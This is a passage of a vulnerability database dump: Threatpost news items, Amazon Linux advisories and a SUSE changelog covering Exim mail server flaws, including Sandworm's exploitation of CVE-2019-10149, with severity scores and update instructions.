The bug was patched last June.\n\nThe NSA this week released a cybersecurity advisory on new exploit activity from Unit 74455 of the GRU Main Center for Special Technologies (GTsST), a division of the Russian military intelligence service, a.k.a. Sandworm, a.k.a. BlackEnergy. The APT [has been linked to](<https://threatpost.com/notpetya-linked-to-industroyer-attack-on-ukraine-energy-grid/138287/>) the Industroyer attack on the Ukrainian power grid as well as the [infamous NotPetya attacks](<https://threatpost.com/maersk-shipping-reports-300m-loss-stemming-from-notpetya-attack/127477/>). According to Kaspersky, the group is part of a nexus of related APTs that also includes a [recently discovered group called Zebrocy](<https://threatpost.com/zebrocy-russian-apt/145328/>).\n\nThe flaw can be exploited using a specially crafted email containing a modified \u201cMAIL FROM\u201d field in a Simple Mail Transfer Protocol (SMTP) message. The APT has been exploiting unpatched Exim servers in this way since at least August, according to [the NSA\u2019s advisory](<https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf>).\n\nOnce Sandworm compromises a target Exim server, it subsequently downloads and executes a shell script from a Sandworm-controlled domain to establish a persistent backdoor that can be used for reconnaissance, spying on mail messages, lateral movement and additional malware implantation.\n\n\u201cThis script would attempt to do the following on the victim machine: Add privileged users; disable network security settings; update SSH configurations to enable additional remote access; and execute an additional script to enable follow-on exploitation,\u201d according to the NSA, which didn\u2019t disclose any details as to the victimology of the latest offensives.\n\nExim admins should update their MTAs to [version 
4.93 or newer](<https://exim.org/mirrors.html>) to mitigate the issue, the NSA noted.\n\n\u201cThis emphasizes the need for a good vulnerability management plan,\u201d Lamar Bailey, senior director of security research at Tripwire, said via email. \u201cCVE-2019-10149 has been out almost a year now and has a CVSS score above 9, making it a critical vulnerability. High-scoring vulnerabilities on a production email server are high risk and there should be plans in place to remediate them ASAP.\u201d\n\n**_Concerned about the IoT security challenges businesses face as more connected devices run our enterprises, drive our manufacturing lines, track and deliver healthcare to patients, and more? On _**[**_June 3 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_, join renowned security technologist Bruce Schneier, Armis CISO Curtis Simpson and Threatpost for a FREE webinar, _**[**_Taming the Unmanaged and IoT Device Tsunami_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_. Get exclusive insights on how to manage this new and growing attack surface. 
_**[**_Please register here_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_ for this sponsored webinar._**\n", "cvss3": {}, "published": "2020-05-29T16:34:38", "type": "threatpost", "title": "NSA Warns of Sandworm Backdoor Attacks on Mail Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-10149", "CVE-2020-5135"], "modified": "2020-05-29T16:34:38", "id": "THREATPOST:130EDA07603C228BE562B445904A297A", "href": "https://threatpost.com/nsa-sandworm-spy-attacks-exim-mail-servers/156125/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-08T21:53:33", "description": "A patch has been issued for a critical flaw in the Exim email server software, which could potentially open Exim-based servers up to denial of service or remote code execution attacks.\n\nExim, which is free software used on Unix-like operating systems (including Linux or Mac OS X), serves as a mail transfer agent that manages mail routing services for organizations. According to a Shodan analysis, Exim is the most used mail transfer agent globally and has over five million internet-facing hosts.\n\nThis specific flaw ([CVE-2019-16928](<https://nvd.nist.gov/vuln/detail/CVE-2019-16928>)) is a heap-based buffer overflow vulnerability. A heap-based [buffer overflow](<https://cwe.mitre.org/data/definitions/122.html>) is a type of flaw in which more data is written to a buffer (a region of memory used to temporarily hold data while it is being moved) than it can hold, where that buffer is allocated in the heap portion of memory (the region of a process\u2019s memory used for dynamically allocated data). The excess data corrupts adjacent memory and could alter other data, opening the door for malicious attacks. 
This specific flaw could enable bad actors to crash servers or, as an Exim advisory said, \u201cremote code execution seems to be possible.\u201d\n\nAccording to Exim, the flaw exists in the string_vformat function in string.c, part of the EHLO command handler. An EHLO command is an Extended Simple Mail Transfer Protocol (ESMTP) command sent by an email server to identify itself when connecting to another email server to start the process of sending an email.\n\n\u201cThe currently known exploit uses an extraordinary long EHLO string to crash the Exim process that is receiving the message,\u201d according to a [Friday advisory](<https://www.exim.org/static/doc/security/CVE-2019-16928.txt>). \u201cWhile at this mode of operation Exim already dropped its privileges, other paths to reach the vulnerable code may exist.\u201d\n\nAccording to [VulDB](<https://vuldb.com/?id.142692>), it is possible to exploit the vulnerability remotely. There are known technical details, but no exploit is available, according to the site. Threatpost has reached out to Exim for further details about when the vulnerability was discovered and disclosed.\n\nThe flaw impacts Exim versions 4.92 through 4.92.2. A fix has been issued in version 4.92.3. No other mitigations exist other than updating the server, according to Exim\u2019s advisory.\n\n\u201cIf you can\u2019t install the above versions, ask your package maintainer for a version containing the backported fix,\u201d advised Exim. 
\u201cOn request and depending on our resources we will support [customers] in backporting the fix.\u201d\n\nIt\u2019s the second critical Exim vulnerability to be patched this month \u2013 [earlier in September](<https://threatpost.com/critical-exim-flaw-opens-millions-of-servers-to-takeover/148108/>), researchers urged users to upgrade their Exim servers immediately after millions of servers were found to be vulnerable to a critical flaw that could allow a remote, unauthenticated attacker to take full control of them. Another [vulnerability](<https://threatpost.com/linux-servers-worm-exim-flaw/145698/>) in June was exploited in a widespread campaign to gain remote command-execution on victims\u2019 Linux systems. Researchers said that for this flaw (CVE-2019-10149) currently more than 3.5 million servers were at risk from [the attacks](<https://threatpost.com/microsoft-pushes-azure-users-to-patch-linux-systems/145749/>), which used a wormable exploit.\n\n**_What are the top cyber security issues associated with privileged account access and credential governance? 
Experts from Thycotic will discuss during our upcoming free _**[**_Threatpost webinar_**](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)**_, \u201cHackers and Security Pros: Where They Agree & Disagree When It Comes to Your Privileged Access Security.\u201d _**[**_Click here to register_**](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)**_._**\n", "cvss3": {}, "published": "2019-09-30T14:12:35", "type": "threatpost", "title": "Critical Exim Flaw Opens Servers to Remote Code Execution", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-10149", "CVE-2019-16928"], "modified": "2019-09-30T14:12:35", "id": "THREATPOST:1E8692DD3729CF2A8B526A85F076513F", "href": "https://threatpost.com/critical-exim-flaw-opens-servers-to-remote-code-execution/148773/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "amazon": [{"lastseen": "2023-06-06T15:15:53", "description": "**Issue Overview:**\n\nExim 4 before 4.94.2 allows Execution with Unnecessary Privileges. Because Exim operates as root in the log directory (owned by a non-root user), a symlink or hard link attack allows overwriting critical root-owned files anywhere on the filesystem. (CVE-2020-28007)\n\nExim 4 before 4.94.2 allows Execution with Unnecessary Privileges. Because Exim operates as root in the spool directory (owned by a non-root user), an attacker can write to a /var/spool/exim4/input spool header file, in which a crafted recipient address can indirectly lead to command execution. (CVE-2020-28008)\n\nExim 4 before 4.94.2 allows Integer Overflow to Buffer Overflow because get_stdinput allows unbounded reads that are accompanied by unbounded increases in a certain size variable. NOTE: exploitation may be impractical because of the execution time needed to overflow (multiple days). 
(CVE-2020-28009)\n\nExim 4 before 4.94.2 allows Out-of-bounds Write because the main function, while setuid root, copies the current working directory pathname into a buffer that is too small (on some common platforms). (CVE-2020-28010)\n\nExim 4 before 4.94.2 allows Heap-based Buffer Overflow in queue_run via two sender options: -R and -S. This may cause privilege escalation from exim to root. (CVE-2020-28011)\n\nExim 4 before 4.94.2 allows Exposure of File Descriptor to Unintended Control Sphere because rda_interpret uses a privileged pipe that lacks a close-on-exec flag. (CVE-2020-28012)\n\nExim 4 before 4.94.2 allows Heap-based Buffer Overflow because it mishandles \"-F '.('\" on the command line, and thus may allow privilege escalation from any user to root. This occurs because of the interpretation of negative sizes in strncpy. (CVE-2020-28013)\n\nExim 4 before 4.94.2 allows Execution with Unnecessary Privileges. The -oP option is available to the exim user, and allows a denial of service because root-owned files can be overwritten. (CVE-2020-28014)\n\nExim 4 before 4.94.2 has Improper Initialization that can lead to recursion-based stack consumption or other consequences. This occurs because use of certain getc functions is mishandled when a client uses BDAT instead of DATA. (CVE-2020-28019)\n\nExim 4 before 4.94.2 has Improper Restriction of Write Operations within the Bounds of a Memory Buffer. This occurs when processing name=value pairs within MAIL FROM and RCPT TO commands. (CVE-2020-28022)\n\nExim 4 before 4.94.2 allows Out-of-bounds Read. smtp_setup_msg may disclose sensitive information from process memory to an unauthenticated SMTP client. (CVE-2020-28023)\n\nExim 4 before 4.94.2 allows Buffer Underwrite that may result in unauthenticated remote attackers executing arbitrary commands, because smtp_ungetc was only intended to push back characters, but can actually push back non-character error codes such as EOF. 
(CVE-2020-28024)\n\nExim 4 before 4.94.2 allows Out-of-bounds Read because pdkim_finish_bodyhash does not validate the relationship between sig->bodyhash.len and b->bh.len; thus, a crafted DKIM-Signature header might lead to a leak of sensitive information from process memory. (CVE-2020-28025)\n\nExim 4 before 4.94.2 has Improper Neutralization of Line Delimiters, relevant in non-default configurations that enable Delivery Status Notification (DSN). Certain uses of ORCPT= can place a newline into a spool header file, and indirectly allow unauthenticated remote attackers to execute arbitrary commands as root. (CVE-2020-28026)\n\nExim 4 before 4.94.2 has Execution with Unnecessary Privileges. By leveraging a delete_pid_file race condition, a local user can delete arbitrary files as root. This involves the -oP and -oPX options. (CVE-2021-27216)\n\n \n**Affected Packages:** \n\n\nexim\n\n \n**Issue Correction:** \nRun _yum update exim_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 exim-debuginfo-4.92-1.33.amzn1.i686 \n \u00a0\u00a0\u00a0 exim-greylist-4.92-1.33.amzn1.i686 \n \u00a0\u00a0\u00a0 exim-mysql-4.92-1.33.amzn1.i686 \n \u00a0\u00a0\u00a0 exim-4.92-1.33.amzn1.i686 \n \u00a0\u00a0\u00a0 exim-mon-4.92-1.33.amzn1.i686 \n \u00a0\u00a0\u00a0 exim-pgsql-4.92-1.33.amzn1.i686 \n \n src: \n \u00a0\u00a0\u00a0 exim-4.92-1.33.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 exim-4.92-1.33.amzn1.x86_64 \n \u00a0\u00a0\u00a0 exim-pgsql-4.92-1.33.amzn1.x86_64 \n \u00a0\u00a0\u00a0 exim-mon-4.92-1.33.amzn1.x86_64 \n \u00a0\u00a0\u00a0 exim-greylist-4.92-1.33.amzn1.x86_64 \n \u00a0\u00a0\u00a0 exim-debuginfo-4.92-1.33.amzn1.x86_64 \n \u00a0\u00a0\u00a0 exim-mysql-4.92-1.33.amzn1.x86_64 \n \n \n\n### Additional References\n\nRed Hat: [CVE-2020-28007](<https://access.redhat.com/security/cve/CVE-2020-28007>), [CVE-2020-28008](<https://access.redhat.com/security/cve/CVE-2020-28008>), 
[CVE-2020-28009](<https://access.redhat.com/security/cve/CVE-2020-28009>), [CVE-2020-28010](<https://access.redhat.com/security/cve/CVE-2020-28010>), [CVE-2020-28011](<https://access.redhat.com/security/cve/CVE-2020-28011>), [CVE-2020-28012](<https://access.redhat.com/security/cve/CVE-2020-28012>), [CVE-2020-28013](<https://access.redhat.com/security/cve/CVE-2020-28013>), [CVE-2020-28014](<https://access.redhat.com/security/cve/CVE-2020-28014>), [CVE-2020-28019](<https://access.redhat.com/security/cve/CVE-2020-28019>), [CVE-2020-28022](<https://access.redhat.com/security/cve/CVE-2020-28022>), [CVE-2020-28023](<https://access.redhat.com/security/cve/CVE-2020-28023>), [CVE-2020-28024](<https://access.redhat.com/security/cve/CVE-2020-28024>), [CVE-2020-28025](<https://access.redhat.com/security/cve/CVE-2020-28025>), [CVE-2020-28026](<https://access.redhat.com/security/cve/CVE-2020-28026>), [CVE-2021-27216](<https://access.redhat.com/security/cve/CVE-2021-27216>)\n\nMitre: [CVE-2020-28007](<https://vulners.com/cve/CVE-2020-28007>), [CVE-2020-28008](<https://vulners.com/cve/CVE-2020-28008>), [CVE-2020-28009](<https://vulners.com/cve/CVE-2020-28009>), [CVE-2020-28010](<https://vulners.com/cve/CVE-2020-28010>), [CVE-2020-28011](<https://vulners.com/cve/CVE-2020-28011>), [CVE-2020-28012](<https://vulners.com/cve/CVE-2020-28012>), [CVE-2020-28013](<https://vulners.com/cve/CVE-2020-28013>), [CVE-2020-28014](<https://vulners.com/cve/CVE-2020-28014>), [CVE-2020-28019](<https://vulners.com/cve/CVE-2020-28019>), [CVE-2020-28022](<https://vulners.com/cve/CVE-2020-28022>), [CVE-2020-28023](<https://vulners.com/cve/CVE-2020-28023>), [CVE-2020-28024](<https://vulners.com/cve/CVE-2020-28024>), [CVE-2020-28025](<https://vulners.com/cve/CVE-2020-28025>), [CVE-2020-28026](<https://vulners.com/cve/CVE-2020-28026>), [CVE-2021-27216](<https://vulners.com/cve/CVE-2021-27216>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", 
"attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-28T20:35:00", "type": "amazon", "title": "Critical: exim", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28010", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28019", "CVE-2020-28022", "CVE-2020-28023", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026", "CVE-2021-27216"], "modified": "2022-08-04T22:42:00", "id": "ALAS-2022-1622", "href": "https://alas.aws.amazon.com/ALAS-2022-1622.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-24T06:30:54", "description": "**Issue Overview:**\n\nPrior versions of Exim 4 have Improper Neutralization of Line Delimiters. Local users can alter the behavior of root processes because a recipient address can have a newline character. (CVE-2020-28015)\n\nPrior versions of Exim 4 allowed Integer Overflow to Buffer Overflow in receive_add_recipient via an e-mail message with fifty million recipients. NOTE: remote exploitation may be difficult because of resource consumption. 
(CVE-2020-28017)\n\nPrior versions of Exim 4 allowed Use After Free in smtp_reset in certain situations that may be common for builds with OpenSSL. (CVE-2020-28018)\n\nPrior versions of Exim 4 have Improper Neutralization of Line Delimiters. An authenticated remote SMTP client can insert newline characters into a spool file (which indirectly leads to remote code execution as root) via AUTH= in a MAIL FROM command. (CVE-2020-28021)\n\n \n**Affected Packages:** \n\n\nexim\n\n \n**Issue Correction:** \nRun _yum update exim_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 exim-mysql-4.92-1.27.amzn1.i686 \n \u00a0\u00a0\u00a0 exim-mon-4.92-1.27.amzn1.i686 \n \u00a0\u00a0\u00a0 exim-debuginfo-4.92-1.27.amzn1.i686 \n \u00a0\u00a0\u00a0 exim-4.92-1.27.amzn1.i686 \n \u00a0\u00a0\u00a0 exim-greylist-4.92-1.27.amzn1.i686 \n \u00a0\u00a0\u00a0 exim-pgsql-4.92-1.27.amzn1.i686 \n \n src: \n \u00a0\u00a0\u00a0 exim-4.92-1.27.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 exim-4.92-1.27.amzn1.x86_64 \n \u00a0\u00a0\u00a0 exim-mon-4.92-1.27.amzn1.x86_64 \n \u00a0\u00a0\u00a0 exim-greylist-4.92-1.27.amzn1.x86_64 \n \u00a0\u00a0\u00a0 exim-pgsql-4.92-1.27.amzn1.x86_64 \n \u00a0\u00a0\u00a0 exim-mysql-4.92-1.27.amzn1.x86_64 \n \u00a0\u00a0\u00a0 exim-debuginfo-4.92-1.27.amzn1.x86_64 \n \n \n\n### Additional References\n\nRed Hat: [CVE-2020-28015](<https://access.redhat.com/security/cve/CVE-2020-28015>), [CVE-2020-28017](<https://access.redhat.com/security/cve/CVE-2020-28017>), [CVE-2020-28018](<https://access.redhat.com/security/cve/CVE-2020-28018>), [CVE-2020-28021](<https://access.redhat.com/security/cve/CVE-2020-28021>)\n\nMitre: [CVE-2020-28015](<https://vulners.com/cve/CVE-2020-28015>), [CVE-2020-28017](<https://vulners.com/cve/CVE-2020-28017>), [CVE-2020-28018](<https://vulners.com/cve/CVE-2020-28018>), [CVE-2020-28021](<https://vulners.com/cve/CVE-2020-28021>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": 
"CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T19:11:00", "type": "amazon", "title": "Important: exim", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28015", "CVE-2020-28017", "CVE-2020-28018", "CVE-2020-28021"], "modified": "2021-05-07T20:34:00", "id": "ALAS-2021-1497", "href": "https://alas.aws.amazon.com/ALAS-2021-1497.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-06-13T14:47:47", "description": "**Issue Overview:**\n\nA flaw was found in Exim versions 4.87 to 4.91 before release 1.20 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to remote command execution. (CVE-2019-10149)\n\n \n**Affected Packages:** \n\n\nexim\n\n \n**Issue Correction:** \nRun _yum update exim_ to update your system. 
\n\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 exim-pgsql-4.91-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 exim-mysql-4.91-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 exim-greylist-4.91-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 exim-debuginfo-4.91-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 exim-mon-4.91-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 exim-4.91-1.20.amzn1.i686 \n \n src: \n \u00a0\u00a0\u00a0 exim-4.91-1.20.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 exim-debuginfo-4.91-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 exim-pgsql-4.91-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 exim-4.91-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 exim-greylist-4.91-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 exim-mon-4.91-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 exim-mysql-4.91-1.20.amzn1.x86_64 \n \n \n\n### Additional References\n\nRed Hat: [CVE-2019-10149](<https://access.redhat.com/security/cve/CVE-2019-10149>)\n\nMitre: [CVE-2019-10149](<https://vulners.com/cve/CVE-2019-10149>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-05T17:12:00", "type": "amazon", "title": "Critical: exim", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": 
false}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-05T23:22:00", "id": "ALAS-2019-1221", "href": "https://alas.aws.amazon.com/ALAS-2019-1221.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2022-04-18T12:40:27", "description": "An update that fixes 26 vulnerabilities is now available.\n\nDescription:\n\n This update for exim fixes the following issues:\n\n\n Exim was updated to exim-4.94.2\n\n security update (boo#1185631)\n\n * CVE-2020-28007: Link attack in Exim's log directory\n * CVE-2020-28008: Assorted attacks in Exim's spool directory\n * CVE-2020-28014: Arbitrary PID file creation\n * CVE-2020-28011: Heap buffer overflow in queue_run()\n * CVE-2020-28010: Heap out-of-bounds write in main()\n * CVE-2020-28013: Heap buffer overflow in parse_fix_phrase()\n * CVE-2020-28016: Heap out-of-bounds write in parse_fix_phrase()\n * CVE-2020-28015: New-line injection into spool header file (local)\n * CVE-2020-28012: Missing close-on-exec flag for privileged pipe\n * CVE-2020-28009: Integer overflow in get_stdinput()\n * CVE-2020-28017: Integer overflow in receive_add_recipient()\n * CVE-2020-28020: Integer overflow in receive_msg()\n * CVE-2020-28023: Out-of-bounds read in smtp_setup_msg()\n * CVE-2020-28021: New-line injection into spool header file (remote)\n * CVE-2020-28022: Heap out-of-bounds read and write in extract_option()\n * CVE-2020-28026: Line truncation and injection in spool_read_header()\n * CVE-2020-28019: Failure to reset function pointer after BDAT error\n * CVE-2020-28024: Heap buffer underflow in smtp_ungetc()\n * CVE-2020-28018: Use-after-free in tls-openssl.c\n * CVE-2020-28025: Heap out-of-bounds read in pdkim_finish_bodyhash()\n\n update to exim-4.94.1\n\n * Fix security issue in BDAT state confusion. 
Ensure we reset known-good\n where we know we need to not be reading BDAT data, as a general case\n fix, and move the places where we switch to BDAT mode until after\n various protocol state checks. Fixes CVE-2020-BDATA reported by Qualys.\n * Fix security issue in SMTP verb option parsing (CVE-2020-EXOPT)\n * Fix security issue with too many recipients on a message (to remove a\n known security problem if someone does set recipients_max to unlimited,\n or if local additions add to the recipient list). Fixes CVE-2020-RCPTL\n reported by Qualys.\n * Fix CVE-2020-28016 (PFPZA): Heap out-of-bounds write in\n parse_fix_phrase()\n * Fix security issue CVE-2020-PFPSN and guard against cmdline invoker\n providing a particularly obnoxious sender full name.\n * Fix Linux security issue CVE-2020-SLCWD and guard against PATH_MAX\n better.\n\n - bring back missing exim_db.8 manual page (fixes boo#1173693)\n\n - bring in changes from current +fixes (lots of taint check fixes)\n * Bug 1329: Fix format of Maildir-format filenames to match other mail-\n related applications. Previously an \"H\" was used where available info\n says that \"M\" should be, so change to match.\n * Bug 2587: Fix pam expansion condition. Tainted values are commonly\n used as arguments, so an implementation trying to copy these into a\n local buffer was taking a taint-enforcement trap. Fix by using\n dynamically created buffers.\n * Bug 2586: Fix listcount expansion operator. Using tainted arguments\n is reasonable, eg. to count headers. Fix by using dynamically created\n buffers rather than a local. Do similar fixes for ACL actions \"dcc\",\n \"log_reject_target\", \"malware\" and \"spam\"; the arguments are expanded\n so could be handling tainted values.\n * Bug 2590: Fix -bi (newaliases). A previous code rearrangement had\n broken the (no-op) support for this sendmail command. 
Restore it to\n doing nothing, silently, and returning good status.\n\n - update to exim 4.94\n * some transports now refuse to use tainted data in constructing their\n delivery location; this WILL BREAK configurations which are not updated\n accordingly. In particular: any Transport use of $local_user which has\n been relying upon check_local_user far away in the Router to make it\n safe, should be updated to replace $local_user with $local_part_data.\n * Attempting to remove, in router or transport, a header name that ends\n with an asterisk (which is a standards-legal name) will now result in\n all headers named starting with the string before the asterisk being\n removed.\n\n - switch pretrans to use lua (fixes boo#1171877)\n\n\n - bring changes from current in +fixes branch\n (patch-exim-fixes-ee83de04d3087efaf808d1f2235a988275c2ee94)\n * fixes CVE-2020-12783 (boo#1171490)\n * Regard command-line recipients as tainted.\n * Bug 2489: Fix crash in the \"pam\" expansion condition.\n * Use tainted buffers for the transport smtp context.\n * Bug 2493: Harden ARC verify against Outlook, which has been seen to\n mix the ordering of its ARC headers. This caused a crash.\n * Bug 2492: Use tainted memory for retry record when needed. Previously\n when a new record was being constructed with information from the\n peer, a trap was taken.\n * Bug 2494: Unset the default for dmarc_tld_file.\n * Fix an uninitialised flag in early-pipelining. Previously connections\n could, depending on the platform, hang at the STARTTLS response.\n * Bug 2498: Reset a counter used for ARC verify before handling another\n message on a connection. 
Previously if one message had ARC headers\n and the following one did not, a crash could result when adding an\n Authentication-Results: header.\n * Bug 2500: Rewind some of the common-coding in string handling between\n the Exim main code and Exim-related utilities.\n * Fix the variables set by the gsasl authenticator.\n * Bug 2507: Modules: on handling a dynamic-module (lookups) open failure,\n only retrieve the error message once.\n * Bug 2501: Fix init call in the heimdal authenticator. Previously it\n adjusted the size of a major service buffer; this failed because the\n buffer was in use at the time. Change to a compile-time increase in\n the buffer size, when this authenticator is compiled into exim.\n\n - update to exim 4.93.0.4 (+fixes release)\n * Avoid costly startup code when not strictly needed. This reduces time\n for some exim process initialisations. It does mean that the logging\n of TLS configuration problems is only done for the daemon startup.\n * Early-pipelining support code is now included unless disabled in\n Makefile.\n * DKIM verification defaults no longer accept sha1 hashes, to conform to\n RFC 8301. They can still be enabled, using the dkim_verify_hashes main\n option.\n * Support CHUNKING from an smtp transport using a transport_filter, when\n DKIM signing is being done. Previously a transport_filter would\n always disable CHUNKING, falling back to traditional DATA.\n * Regard command-line recipients as tainted.\n * Bug 340: Remove the daemon pid file on exit, when due to SIGTERM.\n * Bug 2489: Fix crash in the \"pam\" expansion condition. It seems that\n the PAM library frees one of the arguments given to it, despite the\n documentation. 
Therefore a plain malloc must be used.\n * Bug 2491: Use tainted buffers for the transport smtp context.\n Previously on-stack buffers were used, resulting in a taint trap when DSN\n information copied from a received message was written into the\n buffer.\n * Bug 2493: Harden ARC verify against Outlook, which has been seen to\n mix the ordering of its ARC headers. This caused a crash.\n * Bug 2492: Use tainted memory for retry record when needed. Previously\n when a new record was being constructed with information from the\n peer, a trap was taken.\n * Bug 2494: Unset the default for dmarc_tld_file. Previously a naive\n installation would get error messages from DMARC verify, when it hit\n the nonexistent file indicated by the default. Distros wanting DMARC\n enabled should both provide the file and set the option. Also enforce\n no DMARC verification for command-line sourced messages.\n * Fix an uninitialised flag in early-pipelining. Previously connections\n could, depending on the platform, hang at the STARTTLS response.\n * Bug 2498: Reset a counter used for ARC verify before handling another\n message on a connection. Previously if one message had ARC headers\n and the following one did not, a crash could result when adding an\n Authentication-Results: header.\n * Bug 2500: Rewind some of the common-coding in string handling between\n the Exim main code and Exim-related utilities. The introduction of\n taint tracking also did many adjustments to string handling. Since\n then, eximon frequently terminated with an assert failure.\n * When PIPELINING, synch after every hundred or so RCPT commands sent\n and check for 452 responses. This slightly helps the inefficiency of\n doing a large alias-expansion into a recipient-limited target. The\n max_rcpt transport option still applies (and at the current default,\n will override the new feature). 
The check is done for either cause of\n synch, and forces a fast-retry of all 452'd recipients using a new\n MAIL FROM on the same connection. The new facility is not tunable at\n this time.\n * Fix the variables set by the gsasl authenticator. Previously a\n pointer to library live data was being used, so the results became\n garbage. Make copies while it is still usable.\n * Logging: when the deliver_time selector is set, include the DT= field\n on delivery deferred (==) and failed (**) lines (if a delivery was\n attempted). Previously it was only on completion (=>) lines.\n * Authentication: the gsasl driver now provides the $authN variables in\n time for the expansion of the server_scram_iter and server_scram_salt\n options.\n\n - spec file cleanup to make update work\n - add docdir to spec\n\n - update to exim 4.93\n * SUPPORT_DMARC replaces EXPERIMENTAL_DMARC\n * DISABLE_TLS replaces SUPPORT_TLS\n * Bump the version for the local_scan API.\n * smtp transport option hosts_try_fastopen defaults to \"*\".\n * DNSSec is requested (not required) for all queries. 
